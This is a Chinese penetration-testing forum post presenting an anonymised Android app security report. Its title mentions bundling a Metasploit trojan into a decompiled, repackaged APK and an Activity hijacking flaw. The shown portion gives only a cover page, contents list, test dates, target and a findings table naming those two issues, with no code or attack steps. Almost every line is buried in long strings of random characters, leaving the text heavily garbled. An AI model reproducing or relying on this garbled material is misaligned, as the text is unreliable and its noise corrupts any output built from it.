找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4357|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
% h. X' K+ I8 f# I9 s$ B - ~; `" n& r o1 y5 I) z

1 q5 ]1 ? r1 X U$ r c - U) r$ Y% u+ s+ i! a' e
v9 ~- s9 Y* q* K ; T" L5 ]: ?5 z/ g) q3 d0 N3 C' x

9 ?' L: U2 D4 C- v. a / }' L3 x. t& g8 [. T6 s7 v( I
0 t5 ? n# b, x/ r0 T . m2 Z8 c# i9 Q5 R. S

1 h( |7 X3 @3 E2 e/ ~+ a; W9 b; i& o1 b 文档编号:                + Q% C0 Y, |$ L: a; i& U5 b ! \! E2 ]' w$ T3 q `8 _

! M/ A2 z7 p9 u1 I$ F% j$ D % {3 j& [! l8 ]

8 s8 ]) O1 J5 l3 E7 X* Q% n+ U5 b3 U9 Q. {9 { \ i   3 r; P% z y% S1 \& M! x2 w& y+ I2 v2 J

" z1 B( v+ q, j/ {# n4 S # Q P8 P( Z3 }+ _+ {, ^# [

M/ p% z J6 a) a+ j9 } 7 z% l. f2 p( b- p8 N   1 A+ M& }% q. X) n! ~ / |; v; C% D0 M3 S

3 K( ]. M7 x$ t2 e, \, u+ j2 d& b, f( S0 Q2 R* F. U; k8 P

9 g# \0 m3 D: `4 a2 e$ |3 K, S7 Y1 G& W3 ~: f8 O   ! l2 G- G0 N5 Y2 N/ Z( t% v ) c1 f) R8 \3 X

& h: o1 c+ C6 ~' s8 s% F, }/ x ( q( j* @2 v( c; o& F

7 w4 `% G: V2 v' T' E * p+ A# {* E. m. r* U0 A   & e7 ]& n. |0 |& {: m; v* B* _' g' W, U0 p7 o" ?, U

R$ V& o5 z+ w6 j' L 6 ]) Y/ y& i& @8 c; ^# ?# `

& p, C* I J# t) j8 h) n, ~ 9 x& {' O4 _+ n0 \   ) `0 Z; m6 r$ f8 B$ b3 m J* T7 e* x' S7 E) e# b

- j% Z- }& _! m- i: Y/ _ & i* q- W- p' e' h/ @

, ?' U- s( Z" z c1 h+ K. x 8 W9 z1 G. f7 e0 f: i/ ]' C9 q 某某某APP渗透测试 / Z$ M: p. W% U% H' v0 p 1 O# i- L6 w% o, J6 G

' ]4 m0 G" `3 y4 R' q3 z+ r& l, d ( M& a) a8 X3 C, c: q. m8 y

, B2 ~: l% J7 n7 T; D4 e4 m . g3 b3 C. f" }   1 c# F9 g: B9 P; O; y- u( r5 @# l J$ v( O

- O. W! D- S* q& v / M* b, [0 v0 a7 W3 M

$ V& g$ C" X" N$ k. y6 O" P: [# `; y   9 N C& w4 ?2 ~. ~) N: e2 w @! X1 a7 M0 u3 ^+ L

6 D3 L* [ T/ p5 R/ N 2 T3 ]' C2 Y4 S) G* n% ]0 |

1 h3 s: F# t1 f# `' Z/ E2 l. h5 A6 [( U6 x; p4 ~; g   2 ?) Y- E; o ]. ^. P+ c7 ?; _5 Z 0 ]( K0 i$ O5 s+ I/ R( U

3 k( b/ P: Q0 j- X* @9 @. W $ f9 q. z! p2 u( G1 x

1 o6 C( a0 A8 L& {4 J! n: Q1 @3 O6 R. Z+ ?" f. O' D z8 q   1 Q" f/ U* Q8 m) W( O / J- ^4 M6 v8 R) W# R; x

$ o; l( T# Z! D; x. U* R/ v , J: n9 ]* k1 {6 ]' ]8 l

$ [) g3 U4 F. ?. v G6 ]; k7 `; I# S 技 术 报 告 5 | x8 Z" S6 D( U% ? ( c6 r1 L7 M$ A$ F, K; e9 d* ?

: L& I6 z' J+ I. o' @* P9 B/ k+ k1 l + k2 D( u: k2 P& q3 q2 l7 V% j

" Z1 _, \6 @2 g/ Q7 t* H1 h) [ 2 Q# V$ m/ u1 Y+ H2 b" I' O   / p& {9 V7 p' t5 f " o" _+ F! S2 w. o: U% `

3 I& Z. a7 A/ s/ l+ S3 U , u5 y7 `% B9 N/ O _, k7 t \) ?

6 {2 A- J6 b7 ^, Y : {; e6 I5 j& b( Y" g, y2 i' a   + Z2 f7 F7 T2 A) J; u3 w: P2 D9 \* n* D; F5 j$ O

% k: B3 c: W D / e; Q4 d% @2 ]0 x" [% [4 E" P

8 o! u0 C2 V; X, ?3 t- h5 w 7 B' l1 r; V1 d/ V0 e3 b" A   " S& i6 v1 @7 z6 @/ U* s! {# I, p R

% k0 u, x& S [3 D) g8 L s' ^, r j) k

) A& e4 h4 w7 Q( d0 |/ y8 j+ x, ?% z/ \- [$ }   ) \$ V7 }4 J ? p# J6 c' X. R3 h ( J- P0 N' Z" T$ W& n

8 D- W/ {3 i7 g' C0 _ 2 x( P9 u# z% W9 I! C

' I" u0 R# h6 D7 [ ; u+ e6 k/ ~8 ~   2 K7 h' S* q& N: z" |) o- F3 |5 Q0 w7 r

4 X/ P4 C( h; Z) |/ ? 5 E+ x# w$ X0 H6 y

0 ]' g# y+ y- W2 K# B$ Q/ m. z! ^ `4 W* Z, ]+ `; X. e   0 o; |0 V! f T0 j) s H% [/ S0 ]8 O9 B% T3 T

+ \- @% O6 \$ x: k0 v8 A# \( K" T9 s8 y

; `" o; p" E" q+ s* G+ p 3 V5 Q: }; k) q* _- Z2 k5 @( b% i   + c* i, ^1 V2 y( H( s , k+ ^, i, O3 k7 |

) q0 n7 n9 I( r , Q2 L2 U0 a4 \7 j! x

5 J1 y9 p' L* U6 R0 k1 a# `! Y6 e2 g, U6 \7 _& L9 Q& Z+ A   7 g$ u8 n* V0 X8 `$ L 2 T: L% z1 p* v# i- \( ]9 a

2 g% o" M0 R6 b, ~% K f0 W4 n! x; J ]- s* p) A

/ @$ @& B* Z0 {# h$ i( l+ d' ?% b1 { P3 c& O! L' I   # |' M- K" U2 W5 S% m6 [ 4 B" k3 V$ L% V. Q! ^1 e

# K3 B, ?9 l! q- m; N: d( I , v: l3 ]' J/ [

2 v3 D2 X. N4 Z5 q% m$ R, [* [$ K# P4 l% M( l   - `9 v3 E: V. N1 [1 Q3 b( v- r- X7 Y! M5 N1 @* U

. N2 _6 J% y$ d7 j1 K 9 ^( {, H: g4 I7 x$ K9 o/ g6 J3 C

: h! j4 ^1 R$ ~. q4 Y) `# J - [7 F) E4 `: q i; Z* s/ e9 c   % G& ]9 w9 J6 U0 I, H _% g/ r9 C: F% e, S' X- b9 ?

' h( r9 O4 v5 J: O l3 I. O / ^7 D7 I1 i% z0 r

2 b0 |. w, j2 ?* M5 p$ `8 K: e) F$ \" C5 X   : j+ ]8 J1 `% Y/ Z ! q3 e' V( |$ V N

8 n; K0 E$ t4 Q2 C. H / ~! {/ z$ N0 b. z' v5 a; |- p

i8 l) f! \# h5 y( f 3 }9 v e% e) o t* }   6 K5 U) u( B' @: t) e- e : h0 c5 V# P L0 E$ x3 H, c% [" [

$ J# P; E/ c0 [+ g& h# n" u0 L) c0 R1 h4 B5 ]& X

; h9 G( a2 F+ r 2 z j: e9 a: r+ O; m# a0 ]   ) f5 h& z/ B/ d2 Q4 _3 t, c# x . v9 C3 p+ b" ^( @6 D, b

, E( W) d- _+ [4 ^! J & G& X" @4 L- @) \

% x0 k! A7 g7 Z$ L3 `) A5 A s ( B# @8 p8 d' W* I! D   5 C' q5 j! U' O: Q ' y O* U; \9 s9 |* W

# C" @4 T& |. [" l2 i8 v# R( J1 b% I , Z, U" I) J2 i4 `

8 V- ?9 Q3 ]7 \. T 3 H( R6 q5 } J+ Q+ {; c3 G   ' [: v5 \$ T7 c ; Z \3 m6 k4 ^8 ]

; H# I% f+ ]! P0 m" Y) w2 y' N9 X4 A* j+ ?5 [9 q/ `, j6 J

' ?. |3 h9 w# b$ | / _7 e" v4 \. h7 @/ J   % @9 ]' |$ @3 ?: N 8 @# O6 V6 w0 ^3 h9 q/ U' d

% j) d9 ^ f3 k + M& A; k# ]2 v: b9 u

( W& v$ g: b$ q, k; o 7 ~" w/ s; S" @+ c   & T" F& M5 K! v , D2 W. J {7 V7 D4 w

4 b3 E# R0 y) s3 H# m( g! d $ W9 z/ a+ c: S2 n }. Y- V7 e# U

; P- J: \# m/ f+ Z / d; o$ ~% p4 V; M 二〇二〇年 3 |. U; X7 }8 N+ a0 c `" T, D: B7 _* V- { O1 e' s: T' u

1 r, b! E8 P3 T, G0 F2 l$ N+ h& R# j: T. m9 D
9 c+ C7 W/ z0 f3 O% S % m& |! O" [0 k& y3 `
, a* Z' P: r( Y7 p! ^) J$ T% z' Q2 l# Z; J) [ 3 K) O" m4 G1 Q( L Z" ]: v' y0 Y" v n& |
: T& g5 S, D: Z& |4 ^% K " \0 ?2 @+ ?8 r+ [
4 f# w' r6 X4 c9 l+ y9 S; w R/ ~' y8 d, }) `% L3 Q
+ T. g! q" z" L# l. a3 R' L2 J( X0 _ + \; b7 r0 `3 g( |* @ ! B5 K& |0 }. I8 q0 ?7 M
2 \# Q3 E& B- ~! g4 @ s5 U # Z' { i5 U& [. V* M

4 E* o9 z- |. ~# }$ x ' K2 {/ ] T2 F# E& e2 z# ^6 }. M 目 录 9 g X: l5 y$ Z9 D, N8 {: @! @1 g 0 x/ U/ m$ w+ V8 Z/ S) s2 z

0 W6 x7 I' n0 m' Q: Z 1 o' Z/ T1 P0 @- u& `; k* P 4 d" K6 k# W" x% }- K4 q) U$ o . v% L* i/ F. B; H" _6 ?% `+ [

4 T1 C4 t0 i7 d% p4 W # V; u: y- }$ v, }6 g   3 s" y+ [5 ^. f5 C: u8 R W9 D6 h7 J ( L; _$ K( X. w

/ z: s7 ?/ M7 Z , Q3 o& b7 c. N9 |+ f& f9 H

: B% ~' m p# e+ ?1 M2 X ( S/ `; F/ c x. V1 ~6 ? 1 概述... 3 2 M1 T0 I) e( W; v/ z* w3 _4 Q) i- D " u2 R: V4 |7 R, o# C9 d) I" u

6 b8 I5 H1 S8 g L z- \% \. ^# ~! s* j ]3 k

3 Q. M7 U3 r0 `7 [7 i& ^8 M" M: t$ l* j) N- H 1.2测试时间... 3 $ [- f8 O3 q4 r9 c6 \5 ? & @" y5 M; C1 ~7 p! r/ i

. H; ?6 ^/ W# N( |6 ?) _$ f + p% F' {. V- b% i3 B0 d0 J

\/ ?0 k, q4 h* \" ^# ?5 x$ ]' i( j , o/ V6 Z, t: d- [3 H9 b 1.3测试对象... 3 ) r1 X/ D/ Q* T' n5 v) W0 S ; c0 u1 I5 o ?1 J

% B# }! I9 ~! v. X z( Y3 `4 F8 C+ u$ J8 |

* x. G* Q$ u" c W2 @) ?% K8 K2 K, u+ q' c 1.4测试结果... 3 # t1 J% P' S3 _! U, y 5 Z M" k$ W, a2 K3 E, L. I

" V9 J9 [0 a3 u* R- I% V " A* L2 u( r3 l9 d+ ]- |& J

+ L/ b/ d2 E N3 Z, v @2 N* U! Q) y; q" ]2 i G 2 检测结果... 4 8 l" k. ~8 E) r2 | ( G" b. |$ n' L% [) w2 x& s

8 s% h5 v! E5 s$ i* n7 I. @ - P$ c7 r: z# ?% Q

( k+ M8 X( P. H* [; b3 ?3 ?2 S! ^8 c2 C9 c7 j 2.1 某某某... 4 3 p8 f8 O9 n8 U5 Q& J # O6 r5 A) Z+ I

3 b; ]; R/ D) s% Z& b( r i0 t" w! |$ @ E

' }7 q" D) F6 p% i- }3 O - r9 B6 Q8 Y! F' g 2.1.1检测目标... 4 ' b8 ^- ]0 @6 T5 l- C9 v 5 k& {2 z5 R8 s, X5 d- }

! j/ J- o& r% {' g- ]0 }8 Z$ s: z8 Y; R) a t$ @: _6 K: \% Z

6 C3 h( R* T6 G$ O$ F. W$ C E3 U # X: ~* a! E3 M- M+ H, N; n, W" L 2.1.2检测结果... 4 $ j, R9 |) G( ~/ f \/ L% t2 o! @. @

5 b3 {% h) j8 R. O % }7 F- ^5 X' L" G2 I! p5 X

; E/ S! P1 X9 R) S0 w+ s ( M/ m5 B. V5 }& h, h# b. i 2.1.2.1. 4 & o9 P' {& w1 z ) }; _8 Q( N7 Q

$ s' K2 S" G7 } c, E6 g $ \$ q6 K1 S$ b4 V

$ Z2 k$ O8 k! E; O4 y; H / l6 [1 Z% B* s6 _1 T0 H5 p! T 2.1.2.2. 6 ' e |2 S! \9 u, u' `$ u0 c8 W. n+ R

: ~5 x* ^+ P/ r" Z, R; ? , U) ^/ \0 X' `; f' Z: R

S1 J: v% z8 L; ?9 B, ?( M2 }# ~3 {9 W: `: C- A6 |7 {; T9 K + c# y2 Z: A& |1 |% n. x0 f 2 N h( Y3 \4 v8 F- G

4 x: x% u0 s: L" x1 v8 t ' d6 J9 p* s2 U9 o" t, s' u& a6 P {& ? 6 s. m. \7 A# F! ~* l
8 Z4 }& g& Z9 { 1 D8 r7 v* s7 j: J. x" `( c
5 U8 U" Q; W% o, g; |! j # s2 v4 V( D9 M) C3 K- B - {# f' ^9 S: [" y / `% G, T/ ]4 U1 l K1 v/ _9 Z% O% ]

; f2 X9 e: z1 G* k9 x # a) D$ {( D. a0 v" J/ z: L 1 概述 , r* s6 Z* f3 [) G# `0 V( t 2 F9 Y4 x( o% ]* E

( L D3 R$ y3 m4 k" C) U, f E( U . _0 @, G g4 Q' U" F) n) V

6 Y: E" g( e/ N G) r4 w) B ! ^0 ~$ J6 h2 i0 p" [! n6 j 1.2测试时间 - Q/ C" j/ }) _4 K ) a) b4 }% L! G: g; [

6 y- W0 B e) N p8 i 9 M- k4 Y, d6 {9 o: B, s) | : v5 `6 x! n ^6 R& ?, `1 E# M" g' Z. s) K4 x5 A2 z) C9 o+ w1 g5 t. }8 P5 y. ]4 k# W$ H3 C0 |5 r, ? S" t r7 G% f b7 o# T) J/ Q& R( E6 @& }" N# G: I2 ^' Z/ y2 K0 Q+ ?6 E2 l" r3 a$ q* n5 C: G0 z. F0 y3 t- y- j0 N5 X% g8 [$ n! G" i) M7 h: o! D. j+ Q, ~7 O# b4 q& H# M- n2 U6 D3 R9 c! x- M: S9 ^2 `. S" Z4 L: R$ o, w# F4 }) h! o# L1 {& D4 g C2 p4 W* E" w) v9 b7 {8 q d* L/ [5 o$ _! I" U, m2 C: b5 p: a* a; g: `+ a- n" q0 H6 Q2 e c" {5 U9 o2 d+ o7 k" c5 K. F6 V3 l. |$ ^/ [4 E; s @! z* b' P4 I9 ^7 S" E9 C4 {" Q. Q. {2 T' I" H6 u; P( d/ D! K% y* j; d0 k/ N9 w9 V9 b3 Q0 z2 @! {2 [/ U. g& w7 A( P8 G4 f, i( g- W0 w% ^) ~/ ?: H2 S% p- }+ ^; d E# l' W2 M8 X$ ~3 a s+ Q( Y2 x2 G6 L$ L5 P% B& b# b
. s8 K( x( L1 W+ V& i: F ( l" t1 r: [$ G7 c; J* u) e

; f0 L! `/ b8 ]6 I- N6 k; W+ V6 T* m 渗透测试时间 . g: K/ m) Q: I; y c1 y( k) z; ^2 T9 x% w! S2 P7 j

, L# c6 Q/ {9 v% n& z3 B Y- p) Q3 M$ ~' [ D8 e& Y7 B
0 @% d, c5 y, R9 M$ ]% ^; H * O) b, x. p. J

/ w# F K' B6 i2 }* K& B. `" x/ M& H% B 起始时间 ' g0 X, W3 a4 d$ K& ~. _, ~ / l0 n" K; H' m( s9 R

- g5 j/ V8 H! n! e + R* ~5 S$ W: q3 [ 		: u' _3 A& t9 ? 6 I& Q7 E6 t8 l4 G6 j; m! J9 Q

% t8 m+ V6 d( ?- n+ k ; ^+ S( d& Q( F7 q) G2 @8 R8 K 202046 5 i* m+ w J3 x, `; u; I# n- Z& \6 U _! {( x

- k" B _4 Q4 x) Z# q5 [4 Z 8 p& t1 U6 w# ]3 [
n. g) {$ D- e3 `0 p4 s" a ) o A$ I3 a5 i& w

4 s2 B" Q. q# a8 r7 c; r5 _* i 8 B% U# H/ U5 V0 @2 J1 E# [. `. K/ T 结束时间 & i& Q* {- r+ X, l ) x/ K) }3 u5 G0 W" ~4 B' ?' q

6 i z+ i" v8 y& ]7 C: J 3 L4 z: s( k+ S# }# G" f8 C 		& \* Z r$ O2 l- z# _6 f . d$ H+ K' H7 V+ n4 H2 F( }

' M2 Y& G j6 u9 R5 M8 e8 A* r4 i. ?& X1 v {( o+ t 202049 ( n" F/ S' `/ ~ E# I , c; j$ d& ^" D1 f

1 g1 n$ `, c. N" Y: `; o 9 q- Z, E$ b1 |" ~% s3 N+ z
/ n, S! X7 p' ` ) S1 l O% ~9 Q1 n u( p* O

3 P" F& }5 u' e5 | 2 ]. {8 v: J; L% ^ 1.3测试对象 5 y F( \3 D$ i8 \1 v3 l' K / G" R0 o8 {0 e z8 \9 K+ d

0 c: C" D/ R0 ^# _ 5 x2 n- Y& t, x1 x8 ?' v: B6 ^4 F

- E- k, c3 }2 l: m+ W& T }6 J' [) O/ { 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: V" g# F" u, K& L: k# u0 N% `! _6 W6 u2 b* h: k( g* }

2 `. _$ D$ f' ], o# M4 ?5 D* k( M8 v5 c4 M$ S

% R! d) q% X( @% _+ ~ [ a, J) s" ^) @ 1-1 检测对象 7 m2 o, S8 C! B( Z& H, g2 m 7 U; J; I, a0 k2 P$ r

3 {, e" d( ]& r! ^8 u ! I* t6 }5 g$ J3 x0 m * v) L/ U1 g, @1 x8 C8 ]* `; F8 Q4 i" D! A- C% `5 a1 b2 A& E) Z, q1 j( v: H5 m6 W3 ?, h4 w) b' e2 ?6 j1 B- z; g, j! a. _, x8 [' s# W% \) a& O: w8 C. ^9 @$ _1 k- H) E8 E1 Z) ^5 S1 V+ `- T( b8 V& V3 F4 ?$ T2 V3 J4 d1 q. n- x8 V! T5 D% z7 ]( U( l8 o( m9 A, G& T8 M: l6 [/ _% @' ?5 p8 X$ X2 T# }8 c( P+ a5 B% L6 t; c: h1 u3 {' M& a. D+ _* }4 W0 P. R1 F6 T* M6 B% ]& I; [# ]$ D3 Y' h: L3 T4 h2 x0 n. V# p' P$ [! x! l8 O& { q* I* g% y9 ?" z, B. H- {, G& e' O( c0 q' D" C% u+ k4 i9 l0 H2 z( z/ ?3 ]. i" t9 u8 v8 ^0 ^( K! s) G! C# f6 z u+ h( q* Y* v! G7 N, J( u( [8 ?. ~' Z4 T/ Q0 ~3 ~# g# Q7 V. W7 ^) N k1 y2 C5 k" |6 o/ r; P4 a- o7 {) _1 r) a6 f3 H0 M+ R2 \2 \! W3 Y: |6 U1 z2 \
& ^/ U Z5 R( R0 t# d" n n. i- R8 @2 ~6 n# N/ r K& T' ^3 \/ d4 T1 v

6 N; ^9 I% J6 w" |! ]0 o: ~4 _* @% |: S" a6 S 序号 , r1 e3 _- r" D5 V4 i, z 2 e, v f( s3 n) {2 ~

. c6 {, |% W1 v. O6 u% \ 8 Z. r+ ?0 u* ^ 		6 ^5 S. E' c/ o. E, a0 n7 X5 P $ N) P+ i; P) b& c- j$ `

( d7 J3 `/ L( J7 Q' i 1 C4 ~8 K5 H4 ` 测试对象 4 k4 F" a' [% u" q - w7 t8 }+ u. e4 C8 [0 M

9 Z! j0 e2 C& m5 ~; E4 N) Z) {, ` " t' u0 q+ \* T% t0 N' R: i$ F 		. R& f5 ~7 [, q$ \ l% c 8 I6 h8 r6 K- H2 b$ ? L7 a

7 d' p, X. e6 `& }" B: b4 x/ @ 8 B8 Z) X! P) s, R, \0 L 测试地址 . ^5 @5 x* `& j* ? # A k3 p# _3 | u- C, u: h

6 }. Q8 v9 s0 ~3 R7 V 3 W u! E8 I3 ]# w% U; T+ ^; B" k% F 		Z q, D" Y8 g0 d6 m: @9 y 0 w6 a, C* z* Q

9 L- p; L7 N, W- X: h) H0 U# _ 4 _4 D6 ?9 r1 s! B, J3 V 安全漏洞 $ Z) i2 r( J1 b' o# E . W2 }, x6 |4 v4 `. u

# U( T. F: Q$ S, e( { # e t4 L+ t2 n3 H, N5 x O
! x7 H9 h. `$ E* S& f 3 f+ y7 g3 s4 s8 b9 y

; `7 l& ]+ r! J: f , G8 K0 `0 l( g$ m* j7 B5 D 1 2 ^7 m0 z+ n$ t5 D3 c: M + [4 X: K( l, {

! a- M' p; @$ u$ U/ n2 x1 m' Y1 @; H2 B: q- [! ~' }3 N7 [) C' C 		. Z6 h' m2 y v2 z7 _2 p 8 Z& n6 |. ^; Q/ [, ?$ ]8 x

. b' y/ h; p P0 J* ` Q1 r$ G* r3 Y. a% C. u n- A 某某某安卓APP * J9 G, r5 l+ B* @: ~4 N 2 T$ X1 f! x, @# ~2 y# ?# D6 w

9 L% V$ v& N' F3 n) s 4 g7 E' Y, n7 A4 w* I6 | 		; k8 r+ _% @) v' y R* q# e. O . p# c) @/ y8 j

' S4 n. U' ?2 j$ P5 P( A : Z X+ V, J$ Q1 J5 n   # _2 \2 i* y+ w % V: U9 j8 ^9 H0 I" p" G2 {

2 [5 l; j% c0 ^1 @) i" q4 I # m3 v1 [; R. I7 @; A 		4 n; B: x- B- Y9 z0 a ! m7 ]5 p! ?+ x$ q0 u& G$ b2 H

" `# C9 \7 i: X2 R& t1 S% G: R & s3 l9 U; I% e' r2 u! E& N 2 0 E& M8 p5 c. s6 R1 Z) } 9 @! q. x( T c/ L: Q/ E4 ~$ A

1 C0 F+ ]3 @! F2 J : k" X! v2 P+ s: \1 I- f: f: U! S
% v g2 Q% ^ x, P8 x" P# a2 Y # U# A1 E6 Z2 U/ E# Y

* p. T+ c0 _/ D) M: d5 ~8 P; ] # J" N* K- @7 _5 o9 {7 j( S 1.4测试结果 / L4 [. s9 [. e$ J7 R1 `/ v# e3 p 9 h0 p1 m' E/ c0 p( x9 Q

+ ]( V! I6 d3 { B9 b8 P ! Z" A1 ?/ q$ H$ o, I

# ~) |5 p9 h6 B' m : J# b0 l2 W/ n6 Q/ v6 D. Q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 2 H4 d5 c' P# H) f; t2 v6 t- U d5 @9 B; E& K

$ ~6 R' m" N5 p4 N9 T% d8 {) Y ; C" Y. u- s9 w% \5 u

& L+ i3 c( n" u! E$ K8 | 2 h: V# S+ O7 i n' [) O   8 W) ^) f3 N& G5 o- ^1 t5 M, ^# V6 O 3 d9 Z, V# m! c7 A/ R& m

7 g) B3 s3 L' G & E( Q1 ~& C+ D
, s; t8 E) w M' {+ a4 F . z3 A( m1 K4 C L% @' X, ] 5 I) L0 r" r. q6 u3 Z9 q4 M8 s" ^2 P2 G: l) q! r$ `+ h$ U3 |1 Y6 d! V. u' _) x, k# x9 Q' {# Q4 S; R& K' Y/ V' |1 [& ~( _7 n, o e& }5 l7 A! n# \' i. r3 I" ?( c/ Z& {* y, E ]+ \1 ~( h/ K, [( }. v1 M* D7 N& h1 e: z+ N$ ~: c! d! g/ n* r" K: h: P$ e) B, K* K5 {/ z5 ~9 V- E3 v) I Z5 G8 c& z7 l1 y* G; `+ p9 e) j% m; Y' H* Z$ ]. f: }3 e, p( O2 N8 U0 Z; f3 [5 v# K# K3 A- t6 ~; m3 I- J: \, G* X& z2 J# x+ X+ X+ R( H0 N) ~/ o) T8 Y' n/ t* q5 s6 O; O' [8 c* \4 y) p# [: g3 F, M& Z8 w. I4 v6 |$ K2 k/ A: V; g# R7 s6 c9 K$ N. ]! r4 `/ r+ Q; n! d; K* v/ o& {1 E* h1 q" s+ L7 U* | o) m& t w) h/ i; m' j+ u- j7 F7 v* ]% X8 t+ c. `- g l! a, E/ b& @+ H5 a0 r) p% K8 C( v) U, q% O" Z& P$ \) P( j" |" ~0 i+ S2 ]/ _- }4 C0 Y6 [* u8 ~* x. u* A& O0 e9 l# h& c* n# @8 I8 u2 {. {' R# A3 ?+ P" C, v1 {* c, V4 b2 v G, {& b5 r( l8 S7 V$ K2 }- C, F! A9 o' {- Z+ s9 k) Q( }& X* p0 H8 e2 J( S- o' h* X0 p0 @, i( I* F6 G7 n0 m& N" d$ C* v" n. p c5 ~ D4 M+ M& t! x1 F7 [ l+ ~8 E' U2 V: Z+ r: a8 v5 ?3 r6 D$ E- Q# L+ l6 @0 I4 S Y5 Z4 T( j" s' ]( [" x* |& p7 m: |, u& E0 v7 J8 l" r; z# `+ {( G+ P$ o1 Q& Z& y% H$ h! Q1 P- D) N& V; G- s' l9 B/ g: f, p" i) o4 g: v( R
7 U, E$ e0 @+ @ ; D& f7 d! ~+ Y* Y# b

3 @9 X$ {$ ~8 O- V ; W+ R9 u y b/ U 序号 " F- Y. p8 Z+ ]: A5 P5 x1 S; p& F5 X) Z* P) k+ ~

+ M; i4 y" N. @% s* ? * O2 D4 B+ f# D: v) f/ p3 D! z 		' v( K8 G' C! P* j) U1 k7 q. h/ \9 m# A: X: x! o

: G7 Q8 X, f9 t- h8 ^" I* e: X0 P' } }' p4 s$ L 系统名称 " \2 T* }: s6 N* R1 ` + `* a1 b' d7 K

* Y) i! g4 l9 f- C1 ^ D * l7 G) ?* n7 L. J 		, n* J6 n8 \ Y( B# ]' Q! V; B7 S' }+ }- u+ ~7 m8 I$ C8 U) p

. j9 m" K' J; b. P7 f $ j; W; }* o: z; d# t2 J 漏洞名称 6 V! Z8 b6 ?) c7 G: ` % z: ^: S* M" e* G3 Z8 n( p

- }3 N& k( r g% m+ P0 `* g5 @ ! j! _6 u7 C9 e% u 		5 F, R9 R+ K" p. O$ L4 Y( H ! r2 L0 H/ O+ |+ `1 X( h0 s

) @+ e1 T- P8 A. U" x; c: A : ]2 d1 U& G- t- [+ H 漏洞危害 % K# i9 X- d) K8 a5 L# [- Z! v3 V: Y, H3 c/ _9 r

$ ?2 b% q4 e5 u$ `* O : w/ ~# S8 r4 s$ A# \0 O1 o 		# S) z! R }- u ! J+ i7 E+ Z# I" z/ j" \

3 k$ q; u4 L( A+ d5 v3 p4 X0 j7 }0 d3 l 修复结果 & V- p: I5 P4 t6 [" j1 U ; C/ E! P% k& L" L; U6 m' }

- b8 I- l Z i( |5 H 0 Q( E6 y- p0 c/ ^+ K, u
2 L/ V; X4 g2 z ~+ o' w 6 j. f! R3 Z5 W: I8 U: [

* u4 s J* P0 o0 W " g( Z! Q' ]! o% |) u 1 , ~% Y( r. j1 I$ A9 U0 L. E. [8 @( _ D3 E8 x6 q: ~2 W

( d! m: H- p; W% i9 _ & x( ]1 [( d# z! h7 C3 e1 q 		) G9 p0 ]+ u( O6 T* [9 V8 ^% _3 }$ G& \* }$ Y

& l' O2 l" I. G5 X. Y) O: n0 D - {% ^+ e* Y* n& J* H7 e) N5 t 某某某某某某APP 6 v! C; x! S: l8 D/ w$ { ' C3 a4 ?6 N% s* O: ^

6 e4 S# D1 y0 V6 D. Y3 M! f/ n; L6 h( @1 y* |& K6 F: G 		- ?3 n. W) Q' x$ N2 I$ A6 ^, L; R. {: c% a1 j

2 N. [1 e: s1 u" K- _9 i8 v, ]7 F + ^9 _) B0 g# n( S( P( ? Activity 劫持 , S- ~' a; _! r0 z 6 L6 g* a$ n( N# `" t7 a

; r, ^5 K2 r [9 I2 v- c" U+ P/ a) W8 L6 x1 n+ H5 W% C6 o

. _ {1 b' n- r- d& g2 V* n0 y: i + }. G+ H% \4 q! q' B& X) K   ( a# T& a) x/ D3 F# ^8 I. y+ U6 S3 g) i+ d' v- |

1 f1 M: M$ `0 }7 ]( }- N 4 d( C* Y1 H2 a; l$ U) \4 |: ?7 P/ @ 		d. s% k- {! |! L% j; Q& L- R: I

8 G+ `7 q* M* H: j( V$ ]1 @: H) t ' P7 {5 P& k3 R; l# I ( q. d: J7 w9 Y" f% f# w ; ?2 C5 Y, X0 N0 \

' M0 t9 ?4 W* x/ ?) C3 M4 K: _ 1 i) ~/ J$ Y" @2 ?- A* v3 P+ g } 		* `# V' S% d9 A ^( O : G( k* e6 v% A: G" a! y4 T% Z

" K; V& \: Y# Z7 W8 e3 k% b: ]: q/ r0 W/ o   1 x9 m8 v- j0 ]" x; b . }: D2 d. q# m% {2 w( j. O$ }

* `5 B/ K% A, u1 S9 e + ?, r4 T1 D0 x! I) _$ T5 g
* d. ?: u3 e0 Y5 b9 m" h: j ^ , Y7 e! U. M) f: f# H" t

( @; S& Q8 H6 I6 H , @* _ n9 T9 l- l; T 2 7 r4 S6 r# e8 e2 u / s: w/ J* G9 s0 k

" [ F1 P7 ]. T, \" B* Q; b* t7 s 5 |$ q; M7 S& o 		4 T3 y+ o N4 R 9 F2 t& l* Y5 W* Z; I4 D) g5 b& r

/ |* B" `) d; o! T 3 i5 k* @5 |% A. d% @ 某某某某某某APP 8 g7 _8 G D/ y% X3 [5 ] 2 A% B( g2 Q- \6 K

, V% T( d& m* R2 L , Y2 h3 T& J( x; t 		9 o' C4 l- j2 b0 ~1 v3 u1 E! k+ {. p5 Z+ r; J

5 q% ^" s9 i5 e2 X - G, n, S9 J$ j7 U9 {! i# w" | 反编译二次打包捆绑木马、篡改APP代码 0 Y* y! l* T2 \/ e8 t3 @9 p5 X7 g% {) {

: ]% i$ o" a" {7 J5 k' Z. z; d0 U2 q) X+ N! g' d- L 		' N, Z+ J2 o/ N( N2 [9 K ! e$ K6 \ |5 t' @- l& b& e9 f/ N

$ F _; T# h7 x* a9 Z9 j8 a 9 _' h+ B2 ?" u: C- A 4 v2 m- w3 G, n' S# d' i6 ^( n9 o" d

! z5 C& B0 @* v* S, u* C5 n & k! g* s. I3 ~1 R Y 		: z$ P: ` B- m' x) n2 X: r7 ~0 W 8 s, j! x* h+ G

" Q! E% t$ ^! ?* }9 f. G w: w+ c6 [ u! Z8 d   . q$ s0 z6 M" x+ P2 m 5 t9 y5 [6 O3 F

+ G- g8 a! i6 h% k& ^) N$ Y . O* i. J; n+ V% k7 n- q; I
